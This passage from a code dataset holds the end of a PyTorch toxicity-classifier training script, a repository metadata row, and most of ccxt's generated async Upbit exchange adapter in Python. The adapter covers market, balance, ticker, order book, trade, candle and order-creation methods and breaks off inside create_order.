target_loss = torch.mean(target_loss * target_weight)
if epoch > 9:
aux_loss = FocalLoss()(aux_pred, aux_true)
else:
aux_loss = nn.BCEWithLogitsLoss(reduction="none")(aux_pred, aux_true)
aux_loss = torch.mean(aux_loss * aux_weight)
if epoch > 9:
np_loss = FocalLoss()(np_pred, np_true)
else:
np_loss = nn.BCEWithLogitsLoss(reduction="none")(np_pred, np_true)
np_loss = torch.mean(np_loss * np_weight)
return target_loss, aux_loss, np_loss
def train(self):
if self.debug_mode: self.epochs = 1
# 加载 dataloader
train_loader, valid_loader, tokenizer = self.create_dataloader()
# 生成 embedding
word_embedding = self.create_emb_weights(tokenizer.word_index)
# 训练
self.seed_everything()
model = NeuralNet(word_embedding)
if torch.cuda.is_available():
model.cuda()
lr = 1e-3
# param_lrs = [{'params': param, 'lr': lr} for param in model.parameters()] # 可以为不同层设置不同的学习速率
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
# 渐变学习速率
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lambda epoch: 0.6 ** epoch)
# 损失函数
loss_fn = nn.BCEWithLogitsLoss(reduction='mean')
# 训练
previous_auc_score = 0
stop_flag = 0
for epoch in range(self.epochs):
start_time = time.time()
# 调整一次学习速率
if epoch <= 10:
scheduler.step()
# 切换为训练模式
model.train()
# 初始化当前 epoch 的 loss
avg_loss = 0.
# 加载每个 batch 并训练
for batch_data in train_loader:
x_batch = batch_data[0]
y_batch = batch_data[1]
target_weight_batch = batch_data[2]
aux_weight_batch = batch_data[3]
identity_weight_batch = batch_data[4]
np_weight_batch = batch_data[5]
np_identity_weight_batch = batch_data[6]
#y_pred = model(*x_batch)
y_pred = model(x_batch)
target_loss, aux_loss, np_loss = self.custom_loss(y_pred, y_batch, epoch, target_weight_batch, aux_weight_batch, identity_weight_batch, np_weight_batch)
loss = target_loss + aux_loss + np_loss
#loss = loss_fn(y_pred, y_batch)
optimizer.zero_grad()
loss.backward()
optimizer.step()
avg_loss += loss.item() / len(train_loader)
# 计算验证集
model.eval()
y_pred = np.zeros((len(self.train_df) - self.train_len))
for i, batch_data in enumerate(valid_loader):
x_batch = batch_data[:-1]
y_batch = batch_data[-1]
batch_y_pred = self.sigmoid(model(*x_batch).detach().cpu().numpy())[:, 0]
y_pred[i * self.batch_size: (i + 1) * self.batch_size] = batch_y_pred
# 计算得分
auc_score = self.evaluator.get_final_metric(y_pred)
print("epoch: %d duration: %d min auc_score: %.4f" % (epoch, int((time.time() - start_time) / 60), auc_score))
if not self.debug_mode and epoch > 0:
temp_dict = model.state_dict()
del temp_dict['embedding.weight']
torch.save(temp_dict, "model[pytorch][%d][%s][%d][%.4f].bin" % (self.seed, self.model_name, epoch, auc_score))
# del 训练相关输入和模型
training_history = [train_loader, valid_loader, tokenizer, word_embedding, model, optimizer, scheduler]
for variable in training_history:
del variable
gc.collect()
print("train42_architecture.py")
trainer = Trainer(model_name="train10_focal_loss_seed_kernel", epochs=25, batch_size=512, part=1., seed=1234, debug_mode=False)
trainer.train()
"""
fasttext-crawl-300d-2m
glove840b300dtxt
""" | [
"hedongfeng@qingting.fm"
] | hedongfeng@qingting.fm |
ee0adb91af344e1d810954f9043d90cadc24e120 | a04eff13392361cf6effa7b321ff6c931705534c | /python/ccxt/async_support/upbit.py | 40feec213c77dc75d0ea3312fd5faeeafe4b364e | [
"MIT"
] | permissive | Homiex/homiex-ccxt | 89594883f06f72e8eaf3222d43a66370a030dbd2 | f669d7cb2a9276ba07c7782c5ec1a488f13d930d | refs/heads/master | 2022-07-06T19:47:38.759274 | 2020-03-16T09:27:07 | 2020-03-16T09:27:07 | 246,796,828 | 3 | 4 | MIT | 2022-06-23T01:48:09 | 2020-03-12T09:41:33 | JavaScript | UTF-8 | Python | false | false | 60,440 | py | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import BadRequest
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
class upbit(Exchange):
def describe(self):
return self.deep_extend(super(upbit, self).describe(), {
'id': 'upbit',
'name': 'Upbit',
'countries': ['KR'],
'version': 'v1',
'rateLimit': 1000,
'certified': True,
# new metainfo interface
'has': {
'CORS': True,
'createDepositAddress': True,
'createMarketOrder': True,
'fetchDepositAddress': True,
'fetchClosedOrders': True,
'fetchMyTrades': False,
'fetchOHLCV': True,
'fetchOrder': True,
'fetchOrderBooks': True,
'fetchOpenOrders': True,
'fetchOrders': False,
'fetchTickers': True,
'withdraw': True,
'fetchDeposits': True,
'fetchWithdrawals': True,
'fetchTransactions': False,
},
'timeframes': {
'1m': 'minutes',
'3m': 'minutes',
'5m': 'minutes',
'15m': 'minutes',
'30m': 'minutes',
'1h': 'minutes',
'4h': 'minutes',
'1d': 'days',
'1w': 'weeks',
'1M': 'months',
},
'hostname': 'api.upbit.com',
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/49245610-eeaabe00-f423-11e8-9cba-4b0aed794799.jpg',
'api': 'https://{hostname}',
'www': 'https://upbit.com',
'doc': 'https://docs.upbit.com/docs/%EC%9A%94%EC%B2%AD-%EC%88%98-%EC%A0%9C%ED%95%9C',
'fees': 'https://upbit.com/service_center/guide',
},
'api': {
'public': {
'get': [
'market/all',
'candles/{timeframe}',
'candles/{timeframe}/{unit}',
'candles/minutes/{unit}',
'candles/minutes/1',
'candles/minutes/3',
'candles/minutes/5',
'candles/minutes/15',
'candles/minutes/30',
'candles/minutes/60',
'candles/minutes/240',
'candles/days',
'candles/weeks',
'candles/months',
'trades/ticks',
'ticker',
'orderbook',
],
},
'private': {
'get': [
'accounts',
'orders/chance',
'order',
'orders',
'withdraws',
'withdraw',
'withdraws/chance',
'deposits',
'deposit',
'deposits/coin_addresses',
'deposits/coin_address',
],
'post': [
'orders',
'withdraws/coin',
'withdraws/krw',
'deposits/generate_coin_address',
],
'delete': [
'order',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.0025,
'taker': 0.0025,
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {},
'deposit': {},
},
},
'exceptions': {
'exact': {
'Missing request parameter error. Check the required parametersnot ': BadRequest,
'side is missing, side does not have a valid value': InvalidOrder,
},
'broad': {
'thirdparty_agreement_required': PermissionDenied,
'out_of_scope': PermissionDenied,
'order_not_found': OrderNotFound,
'insufficient_funds': InsufficientFunds,
'invalid_access_key': AuthenticationError,
'jwt_verification': AuthenticationError,
'create_ask_error': ExchangeError,
'create_bid_error': ExchangeError,
'volume_too_large': InvalidOrder,
'invalid_funds': InvalidOrder,
},
},
'options': {
'createMarketBuyOrderRequiresPrice': True,
'fetchTickersMaxLength': 4096, # 2048,
'fetchOrderBooksMaxLength': 4096, # 2048,
'symbolSeparator': '-',
'tradingFeesByQuoteCurrency': {
'KRW': 0.0005,
},
},
})
async def fetch_currency(self, code, params={}):
# self method is for retrieving funding fees and limits per currency
# it requires private access and API keys properly set up
await self.load_markets()
currency = self.currency(code)
return await self.fetch_currency_by_id(currency['id'], params)
async def fetch_currency_by_id(self, id, params={}):
# self method is for retrieving funding fees and limits per currency
# it requires private access and API keys properly set up
request = {
'currency': id,
}
response = await self.privateGetWithdrawsChance(self.extend(request, params))
#
# {
# "member_level": {
# "security_level": 3,
# "fee_level": 0,
# "email_verified": True,
# "identity_auth_verified": True,
# "bank_account_verified": True,
# "kakao_pay_auth_verified": False,
# "locked": False,
# "wallet_locked": False
# },
# "currency": {
# "code": "BTC",
# "withdraw_fee": "0.0005",
# "is_coin": True,
# "wallet_state": "working",
# "wallet_support": ["deposit", "withdraw"]
# },
# "account": {
# "currency": "BTC",
# "balance": "10.0",
# "locked": "0.0",
# "avg_krw_buy_price": "8042000",
# "modified": False
# },
# "withdraw_limit": {
# "currency": "BTC",
# "minimum": null,
# "onetime": null,
# "daily": "10.0",
# "remaining_daily": "10.0",
# "remaining_daily_krw": "0.0",
# "fixed": null,
# "can_withdraw": True
# }
# }
#
memberInfo = self.safe_value(response, 'member_level', {})
currencyInfo = self.safe_value(response, 'currency', {})
withdrawLimits = self.safe_value(response, 'withdraw_limit', {})
canWithdraw = self.safe_value(withdrawLimits, 'can_withdraw')
walletState = self.safe_string(currencyInfo, 'wallet_state')
walletLocked = self.safe_value(memberInfo, 'wallet_locked')
locked = self.safe_value(memberInfo, 'locked')
active = True
if (canWithdraw is not None) and canWithdraw:
active = False
elif walletState != 'working':
active = False
elif (walletLocked is not None) and walletLocked:
active = False
elif (locked is not None) and locked:
active = False
maxOnetimeWithdrawal = self.safe_float(withdrawLimits, 'onetime')
maxDailyWithdrawal = self.safe_float(withdrawLimits, 'daily', maxOnetimeWithdrawal)
remainingDailyWithdrawal = self.safe_float(withdrawLimits, 'remaining_daily', maxDailyWithdrawal)
maxWithdrawLimit = None
if remainingDailyWithdrawal > 0:
maxWithdrawLimit = remainingDailyWithdrawal
else:
maxWithdrawLimit = maxDailyWithdrawal
precision = None
currencyId = self.safe_string(currencyInfo, 'code')
code = self.safe_currency_code(currencyId)
return {
'info': response,
'id': currencyId,
'code': code,
'name': code,
'active': active,
'fee': self.safe_float(currencyInfo, 'withdraw_fee'),
'precision': precision,
'limits': {
'withdraw': {
'min': self.safe_float(withdrawLimits, 'minimum'),
'max': maxWithdrawLimit,
},
},
}
async def fetch_market(self, symbol, params={}):
# self method is for retrieving trading fees and limits per market
# it requires private access and API keys properly set up
await self.load_markets()
market = self.market(symbol)
return await self.fetch_market_by_id(market['id'], params)
    async def fetch_market_by_id(self, id, params={}):
        """Fetch per-market trading fees and limits from the private
        orders/chance endpoint and return a unified market structure.

        :param str id: exchange-specific market id, e.g. "KRW-BTC"
        :param dict params: extra parameters merged into the API request
        :returns dict: unified market description including fees and limits
        """
        # self method is for retrieving trading fees and limits per market
        # it requires private access and API keys properly set up
        request = {
            'market': id,
        }
        response = await self.privateGetOrdersChance(self.extend(request, params))
        #
        #     {     bid_fee: "0.0005",
        #           ask_fee: "0.0005",
        #            market: {          id:   "KRW-BTC",
        #                             name:   "BTC/KRW",
        #                      order_types: ["limit"],
        #                      order_sides: ["ask", "bid"],
        #                              bid: {  currency: "KRW",
        #                                     price_unit:  null,
        #                                      min_total:  1000  },
        #                              ask: {  currency: "BTC",
        #                                     price_unit:  null,
        #                                      min_total:  1000  },
        #                        max_total:   "1000000000.0",
        #                            state:   "active"              },
        #       bid_account: {          currency: "KRW",
        #                                balance: "0.0",
        #                                 locked: "0.0",
        #                      avg_krw_buy_price: "0",
        #                               modified:  False },
        #       ask_account: {          currency: "BTC",
        #                                balance: "0.00780836",
        #                                 locked: "0.0",
        #                      avg_krw_buy_price: "6465564.67",
        #                               modified:  False    }      }
        #
        marketInfo = self.safe_value(response, 'market')
        bid = self.safe_value(marketInfo, 'bid')
        ask = self.safe_value(marketInfo, 'ask')
        marketId = self.safe_string(marketInfo, 'id')
        # the ask side holds the base currency, the bid side the quote currency
        baseId = self.safe_string(ask, 'currency')
        quoteId = self.safe_string(bid, 'currency')
        base = self.safe_currency_code(baseId)
        quote = self.safe_currency_code(quoteId)
        symbol = base + '/' + quote
        precision = {
            'amount': 8,
            'price': 8,
        }
        state = self.safe_string(marketInfo, 'state')
        active = (state == 'active')
        bidFee = self.safe_float(response, 'bid_fee')
        askFee = self.safe_float(response, 'ask_fee')
        # NOTE(review): max() raises TypeError if either fee is absent(None) -
        # assumes the endpoint always returns both bid_fee and ask_fee
        fee = max(bidFee, askFee)
        return {
            'info': response,
            'id': marketId,
            'symbol': symbol,
            'base': base,
            'quote': quote,
            'baseId': baseId,
            'quoteId': quoteId,
            'active': active,
            'precision': precision,
            'maker': fee,
            'taker': fee,
            'limits': {
                'amount': {
                    'min': self.safe_float(ask, 'min_total'),
                    'max': None,
                },
                'price': {
                    'min': math.pow(10, -precision['price']),
                    'max': None,
                },
                'cost': {
                    'min': self.safe_float(bid, 'min_total'),
                    'max': self.safe_float(marketInfo, 'max_total'),
                },
            },
        }
    async def fetch_markets(self, params={}):
        """Fetch the list of all markets from the public market/all endpoint
        and return a list of unified market structures.

        :param dict params: extra parameters merged into the API request
        :returns list[dict]: unified market descriptions
        """
        response = await self.publicGetMarketAll(params)
        #
        #     [{       market: "KRW-BTC",
        #         korean_name: "비트코인",
        #        english_name: "Bitcoin"  },
        #      {       market: "KRW-DASH",
        #         korean_name: "대시",
        #        english_name: "Dash"  },
        #      {       market: "KRW-ETH",
        #         korean_name: "이더리움",
        #        english_name: "Ethereum"},
        #      {       market: "BTC-ETH",
        #         korean_name: "이더리움",
        #        english_name: "Ethereum"},
        #      ...,
        #      {       market: "BTC-BSV",
        #         korean_name: "비트코인에스브이",
        #        english_name: "Bitcoin SV"}]
        #
        result = []
        for i in range(0, len(response)):
            market = response[i]
            id = self.safe_string(market, 'market')
            # Upbit market ids are "QUOTE-BASE", so the quote currency comes first
            quoteId, baseId = id.split('-')
            base = self.safe_currency_code(baseId)
            quote = self.safe_currency_code(quoteId)
            symbol = base + '/' + quote
            precision = {
                'amount': 8,
                'price': 8,
            }
            active = True
            # trading fees differ per quote currency(see self.options)
            makerFee = self.safe_float(self.options['tradingFeesByQuoteCurrency'], quote, self.fees['trading']['maker'])
            takerFee = self.safe_float(self.options['tradingFeesByQuoteCurrency'], quote, self.fees['trading']['taker'])
            result.append({
                'id': id,
                'symbol': symbol,
                'base': base,
                'quote': quote,
                'baseId': baseId,
                'quoteId': quoteId,
                'active': active,
                'info': market,
                'precision': precision,
                'maker': makerFee,
                'taker': takerFee,
                'limits': {
                    'amount': {
                        'min': math.pow(10, -precision['amount']),
                        'max': None,
                    },
                    'price': {
                        'min': math.pow(10, -precision['price']),
                        'max': None,
                    },
                    'cost': {
                        'min': None,
                        'max': None,
                    },
                },
            })
        return result
    async def fetch_balance(self, params={}):
        """Fetch account balances for all currencies from the private
        accounts endpoint.

        :param dict params: extra parameters merged into the API request
        :returns dict: unified balance structure keyed by currency code
        """
        await self.load_markets()
        response = await self.privateGetAccounts(params)
        #
        #     [{         currency: "BTC",
        #                 balance: "0.005",
        #                  locked: "0.0",
        #       avg_krw_buy_price: "7446000",
        #                modified:  False     },
        #      {         currency: "ETH",
        #                 balance: "0.1",
        #                  locked: "0.0",
        #       avg_krw_buy_price: "250000",
        #                modified:  False    }   ]
        #
        result = {'info': response}
        for i in range(0, len(response)):
            balance = response[i]
            currencyId = self.safe_string(balance, 'currency')
            code = self.safe_currency_code(currencyId)
            account = self.account()
            # 'balance' is the free amount, 'locked' is the amount tied up in orders
            account['free'] = self.safe_float(balance, 'balance')
            account['used'] = self.safe_float(balance, 'locked')
            result[code] = account
        return self.parse_balance(result)
def get_symbol_from_market_id(self, marketId, market=None):
if marketId is None:
return None
market = self.safe_value(self.markets_by_id, marketId, market)
if market is not None:
return market['symbol']
baseId, quoteId = marketId.split(self.options['symbolSeparator'])
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
return base + '/' + quote
    async def fetch_order_books(self, symbols=None, params={}):
        """Fetch order books for multiple symbols in a single request.

        When symbols is None all markets are requested, which may exceed the
        maximum URL length(see self.options['fetchOrderBooksMaxLength']).

        :param list[str] symbols: unified symbols, or None for all markets
        :param dict params: extra parameters merged into the API request
        :returns dict: order books keyed by unified symbol
        :raises ExchangeError: if the implied request URL would be too long
        """
        await self.load_markets()
        ids = None
        if symbols is None:
            ids = ','.join(self.ids)
            # max URL length is 2083 symbols, including http schema, hostname, tld, etc...
            if len(ids) > self.options['fetchOrderBooksMaxLength']:
                numIds = len(self.ids)
                raise ExchangeError(self.id + ' has ' + str(numIds) + ' symbols(' + str(len(ids)) + ' characters) exceeding max URL length(' + str(self.options['fetchOrderBooksMaxLength']) + ' characters), you are required to specify a list of symbols in the first argument to fetchOrderBooks')
        else:
            ids = self.market_ids(symbols)
            ids = ','.join(ids)
        request = {
            'markets': ids,
        }
        response = await self.publicGetOrderbook(self.extend(request, params))
        #
        #     [{          market:   "BTC-ETH",
        #               timestamp:    1542899030043,
        #          total_ask_size:    109.57065201,
        #          total_bid_size:    125.74430631,
        #         orderbook_units: [{  ask_price: 0.02926679,
        #                              bid_price: 0.02919904,
        #                               ask_size: 4.20293961,
        #                               bid_size: 11.65043576 },
        #                           ...,
        #                           {  ask_price: 0.02938209,
        #                              bid_price: 0.0291231,
        #                               ask_size: 0.05135782,
        #                               bid_size: 13.5595     }  ]},
        #      {          market:   "KRW-BTC",
        #               timestamp:    1542899034662,
        #          total_ask_size:    12.89790974,
        #          total_bid_size:    4.88395783,
        #         orderbook_units: [{  ask_price: 5164000,
        #                              bid_price: 5162000,
        #                               ask_size: 2.57606495,
        #                               bid_size: 0.214       },
        #                           ...,
        #                           {  ask_price: 5176000,
        #                              bid_price: 5152000,
        #                               ask_size: 2.752,
        #                               bid_size: 0.4650305   }  ]}  ]
        #
        result = {}
        for i in range(0, len(response)):
            orderbook = response[i]
            symbol = self.get_symbol_from_market_id(self.safe_string(orderbook, 'market'))
            timestamp = self.safe_integer(orderbook, 'timestamp')
            result[symbol] = {
                # bids sorted highest-first, asks lowest-first(unified convention)
                'bids': self.sort_by(self.parse_bids_asks(orderbook['orderbook_units'], 'bid_price', 'bid_size'), 0, True),
                'asks': self.sort_by(self.parse_bids_asks(orderbook['orderbook_units'], 'ask_price', 'ask_size'), 0),
                'timestamp': timestamp,
                'datetime': self.iso8601(timestamp),
                'nonce': None,
            }
        return result
async def fetch_order_book(self, symbol, limit=None, params={}):
orderbooks = await self.fetch_order_books([symbol], params)
return self.safe_value(orderbooks, symbol)
    def parse_ticker(self, ticker, market=None):
        """Convert an exchange ticker structure into the unified ticker format.

        :param dict ticker: raw ticker entry from the public ticker endpoint
        :param dict market: optional market structure used for symbol resolution
        :returns dict: unified ticker
        """
        #
        #       {               market: "BTC-ETH",
        #                   trade_date: "20181122",
        #                   trade_time: "104543",
        #               trade_date_kst: "20181122",
        #               trade_time_kst: "194543",
        #              trade_timestamp:  1542883543097,
        #                opening_price:  0.02976455,
        #                   high_price:  0.02992577,
        #                    low_price:  0.02934283,
        #                  trade_price:  0.02947773,
        #           prev_closing_price:  0.02966,
        #                       change: "FALL",
        #                 change_price:  0.00018227,
        #                  change_rate:  0.0061453136,
        #          signed_change_price:  -0.00018227,
        #           signed_change_rate:  -0.0061453136,
        #                 trade_volume:  1.00000005,
        #              acc_trade_price:  100.95825586,
        #          acc_trade_price_24h:  289.58650166,
        #             acc_trade_volume:  3409.85311036,
        #         acc_trade_volume_24h:  9754.40510513,
        #        highest_52_week_price:  0.12345678,
        #         highest_52_week_date: "2018-02-01",
        #         lowest_52_week_price:  0.023936,
        #          lowest_52_week_date: "2017-12-08",
        #                    timestamp:  1542883543813  }
        #
        timestamp = self.safe_integer(ticker, 'trade_timestamp')
        symbol = self.get_symbol_from_market_id(self.safe_string(ticker, 'market'), market)
        previous = self.safe_float(ticker, 'prev_closing_price')
        # 'trade_price' is the price of the most recent trade(last/close)
        last = self.safe_float(ticker, 'trade_price')
        # signed values carry the direction, unlike 'change_price'/'change_rate'
        change = self.safe_float(ticker, 'signed_change_price')
        percentage = self.safe_float(ticker, 'signed_change_rate')
        return {
            'symbol': symbol,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'high': self.safe_float(ticker, 'high_price'),
            'low': self.safe_float(ticker, 'low_price'),
            'bid': None,
            'bidVolume': None,
            'ask': None,
            'askVolume': None,
            'vwap': None,
            'open': self.safe_float(ticker, 'opening_price'),
            'close': last,
            'last': last,
            'previousClose': previous,
            'change': change,
            'percentage': percentage,
            'average': None,
            'baseVolume': self.safe_float(ticker, 'acc_trade_volume_24h'),
            'quoteVolume': self.safe_float(ticker, 'acc_trade_price_24h'),
            'info': ticker,
        }
    async def fetch_tickers(self, symbols=None, params={}):
        """Fetch tickers for multiple symbols in a single request.

        When symbols is None all markets are requested, which may exceed the
        maximum URL length(see self.options['fetchTickersMaxLength']).

        :param list[str] symbols: unified symbols, or None for all markets
        :param dict params: extra parameters merged into the API request
        :returns dict: unified tickers keyed by symbol
        :raises ExchangeError: if the implied request URL would be too long
        """
        await self.load_markets()
        ids = None
        if symbols is None:
            ids = ','.join(self.ids)
            # max URL length is 2083 symbols, including http schema, hostname, tld, etc...
            if len(ids) > self.options['fetchTickersMaxLength']:
                numIds = len(self.ids)
                raise ExchangeError(self.id + ' has ' + str(numIds) + ' symbols exceeding max URL length, you are required to specify a list of symbols in the first argument to fetchTickers')
        else:
            ids = self.market_ids(symbols)
            ids = ','.join(ids)
        request = {
            'markets': ids,
        }
        response = await self.publicGetTicker(self.extend(request, params))
        #
        #     [{               market: "BTC-ETH",
        #                  trade_date: "20181122",
        #                  trade_time: "104543",
        #              trade_date_kst: "20181122",
        #              trade_time_kst: "194543",
        #             trade_timestamp:  1542883543097,
        #               opening_price:  0.02976455,
        #                  high_price:  0.02992577,
        #                   low_price:  0.02934283,
        #                 trade_price:  0.02947773,
        #          prev_closing_price:  0.02966,
        #                      change: "FALL",
        #                change_price:  0.00018227,
        #                 change_rate:  0.0061453136,
        #         signed_change_price:  -0.00018227,
        #          signed_change_rate:  -0.0061453136,
        #                trade_volume:  1.00000005,
        #             acc_trade_price:  100.95825586,
        #         acc_trade_price_24h:  289.58650166,
        #            acc_trade_volume:  3409.85311036,
        #        acc_trade_volume_24h:  9754.40510513,
        #       highest_52_week_price:  0.12345678,
        #        highest_52_week_date: "2018-02-01",
        #        lowest_52_week_price:  0.023936,
        #         lowest_52_week_date: "2017-12-08",
        #                   timestamp:  1542883543813  }]
        #
        result = {}
        for t in range(0, len(response)):
            ticker = self.parse_ticker(response[t])
            symbol = ticker['symbol']
            result[symbol] = ticker
        return result
async def fetch_ticker(self, symbol, params={}):
tickers = await self.fetch_tickers([symbol], params)
return self.safe_value(tickers, symbol)
def parse_trade(self, trade, market=None):
#
# fetchTrades
#
# { market: "BTC-ETH",
# trade_date_utc: "2018-11-22",
# trade_time_utc: "13:55:24",
# timestamp: 1542894924397,
# trade_price: 0.02914289,
# trade_volume: 0.20074397,
# prev_closing_price: 0.02966,
# change_price: -0.00051711,
# ask_bid: "ASK",
# sequential_id: 15428949259430000}
#
# fetchOrder trades
#
# {
# "market": "KRW-BTC",
# "uuid": "78162304-1a4d-4524-b9e6-c9a9e14d76c3",
# "price": "101000.0",
# "volume": "0.77368323",
# "funds": "78142.00623",
# "ask_fee": "117.213009345",
# "bid_fee": "117.213009345",
# "created_at": "2018-04-05T14:09:15+09:00",
# "side": "bid",
# }
#
id = self.safe_string_2(trade, 'sequential_id', 'uuid')
orderId = None
timestamp = self.safe_integer(trade, 'timestamp')
if timestamp is None:
timestamp = self.parse8601(self.safe_string(trade, 'created_at'))
side = None
askOrBid = self.safe_string_lower_2(trade, 'ask_bid', 'side')
if askOrBid == 'ask':
side = 'sell'
elif askOrBid == 'bid':
side = 'buy'
cost = self.safe_float(trade, 'funds')
price = self.safe_float_2(trade, 'trade_price', 'price')
amount = self.safe_float_2(trade, 'trade_volume', 'volume')
if cost is None:
if amount is not None:
if price is not None:
cost = price * amount
marketId = self.safe_string(trade, 'market')
market = self.safe_value(self.markets_by_id, marketId)
fee = None
feeCurrency = None
symbol = None
if market is not None:
symbol = market['symbol']
feeCurrency = market['quote']
else:
baseId, quoteId = marketId.split('-')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
feeCurrency = quote
feeCost = self.safe_string(trade, askOrBid + '_fee')
if feeCost is not None:
fee = {
'currency': feeCurrency,
'cost': feeCost,
}
return {
'id': id,
'info': trade,
'order': orderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': 'limit',
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': fee,
}
    async def fetch_trades(self, symbol, since=None, limit=None, params={}):
        """Fetch the most recent public trades for a symbol.

        :param str symbol: unified market symbol
        :param int since: unused by self endpoint, applied as a filter in parse_trades
        :param int limit: number of trades to fetch(defaults to 200)
        :param dict params: extra parameters merged into the API request
        :returns list[dict]: unified trades
        """
        await self.load_markets()
        market = self.market(symbol)
        if limit is None:
            limit = 200
        request = {
            'market': market['id'],
            'count': limit,
        }
        response = await self.publicGetTradesTicks(self.extend(request, params))
        #
        #     [{            market: "BTC-ETH",
        #             trade_date_utc: "2018-11-22",
        #             trade_time_utc: "13:55:24",
        #                  timestamp:  1542894924397,
        #                trade_price:  0.02914289,
        #               trade_volume:  0.20074397,
        #         prev_closing_price:  0.02966,
        #               change_price:  -0.00051711,
        #                    ask_bid: "ASK",
        #              sequential_id:  15428949259430000 },
        #      {            market: "BTC-ETH",
        #             trade_date_utc: "2018-11-22",
        #             trade_time_utc: "13:03:10",
        #                  timestamp:  1542891790123,
        #                trade_price:  0.02917,
        #               trade_volume:  7.392,
        #         prev_closing_price:  0.02966,
        #               change_price:  -0.00049,
        #                    ask_bid: "ASK",
        #              sequential_id:  15428917910540000 }  ]
        #
        return self.parse_trades(response, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None, timeframe='1d', since=None, limit=None):
#
# { market: "BTC-ETH",
# candle_date_time_utc: "2018-11-22T13:47:00",
# candle_date_time_kst: "2018-11-22T22:47:00",
# opening_price: 0.02915963,
# high_price: 0.02915963,
# low_price: 0.02915448,
# trade_price: 0.02915448,
# timestamp: 1542894473674,
# candle_acc_trade_price: 0.0981629437535248,
# candle_acc_trade_volume: 3.36693173,
# unit: 1 },
#
return [
self.parse8601(self.safe_string(ohlcv, 'candle_date_time_utc')),
self.safe_float(ohlcv, 'opening_price'),
self.safe_float(ohlcv, 'high_price'),
self.safe_float(ohlcv, 'low_price'),
self.safe_float(ohlcv, 'trade_price'),
self.safe_float(ohlcv, 'candle_acc_trade_volume'), # base volume
]
    async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
        """Fetch OHLCV candles for a symbol.

        Upbit paginates candles backwards from a 'to' datetime, so a 'since'
        argument is converted into an equivalent 'to' bound.

        :param str symbol: unified market symbol
        :param str timeframe: unified timeframe, e.g. '1m', '1d'
        :param int since: earliest candle timestamp in milliseconds
        :param int limit: number of candles(defaults to 200)
        :param dict params: extra parameters merged into the API request
        :returns list[list]: unified OHLCV rows
        """
        await self.load_markets()
        market = self.market(symbol)
        timeframePeriod = self.parse_timeframe(timeframe)
        timeframeValue = self.timeframes[timeframe]
        if limit is None:
            limit = 200
        request = {
            'market': market['id'],
            'timeframe': timeframeValue,
            'count': limit,
        }
        method = 'publicGetCandlesTimeframe'
        if timeframeValue == 'minutes':
            # minute candles use a separate endpoint with a 'unit' parameter
            numMinutes = int(round(timeframePeriod / 60))
            request['unit'] = numMinutes
            method += 'Unit'
        if since is not None:
            # convert `since` to `to` value
            request['to'] = self.iso8601(self.sum(since, timeframePeriod * limit * 1000))
        response = await getattr(self, method)(self.extend(request, params))
        #
        #     [{                  market: "BTC-ETH",
        #            candle_date_time_utc: "2018-11-22T13:47:00",
        #            candle_date_time_kst: "2018-11-22T22:47:00",
        #                   opening_price:  0.02915963,
        #                      high_price:  0.02915963,
        #                       low_price:  0.02915448,
        #                     trade_price:  0.02915448,
        #                       timestamp:  1542894473674,
        #          candle_acc_trade_price:  0.0981629437535248,
        #         candle_acc_trade_volume:  3.36693173,
        #                            unit:  1                     },
        #      {                  market: "BTC-ETH",
        #            candle_date_time_utc: "2018-11-22T10:06:00",
        #            candle_date_time_kst: "2018-11-22T19:06:00",
        #                   opening_price:  0.0294,
        #                      high_price:  0.02940882,
        #                       low_price:  0.02934283,
        #                     trade_price:  0.02937354,
        #                       timestamp:  1542881219276,
        #          candle_acc_trade_price:  0.0762597110943884,
        #         candle_acc_trade_volume:  2.5949617,
        #                            unit:  1                     }  ]
        #
        return self.parse_ohlcvs(response, market, timeframe, since, limit)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
if type == 'market':
# for market buy it requires the amount of quote currency to spend
if side == 'buy':
if self.options['createMarketBuyOrderRequiresPrice']:
if price is None:
raise InvalidOrder(self.id + " createOrder() requires the price argument with market buy orders to calculate total order cost(amount to spend), where cost = amount * price. Supply a price argument to createOrder() call if you want the cost to be calculated for you from price and amount, or, alternatively, add .options['createMarketBuyOrderRequiresPrice'] = False to supply the cost in the amount argument(the exchange-specific behaviour)")
else:
amount = amount * price
orderSide = None
if side == 'buy':
orderSide = 'bid'
elif side == 'sell':
orderSide = 'ask'
else:
raise InvalidOrder(self.id + ' createOrder allows buy or sell side onlynot ')
await self.load_markets()
market = self.market(symbol)
request = {
'market': market['id'],
'side': orderSide,
}
if type == 'limit':
request['volume'] = self.amount_to_precision(symbol, amount)
request['price'] = self.price_to_precision(symbol, price)
request['ord_type'] = type
elif type == 'market':
if side == 'buy':
request['ord_type'] = 'price'
request['price'] = self.price_to_precision(symbol, amount)
elif side == 'sell':
request['ord_type'] = type
request['volume'] = self.amount_to_precision(symbol, amount)
response = await self.privatePostOrders(self.extend(request, params))
#
# {
# 'uuid': 'cdd92199-2897-4e14-9448-f923320408ad',
# 'side': 'bid',
# 'ord_type': 'limit',
# 'price': '100.0',
# 'avg_price': '0.0',
# 'state': 'wait',
# 'market': 'KRW-BTC',
# 'created_at': '2018-04-10T15:42:23+09:00',
# 'volume': '0.01',
# 'remaining_volume': '0.01',
# 'reserved_fee': '0.0015',
# 'remaining_fee': '0.0015',
# 'paid_fee': '0.0',
# 'locked': '1.0015',
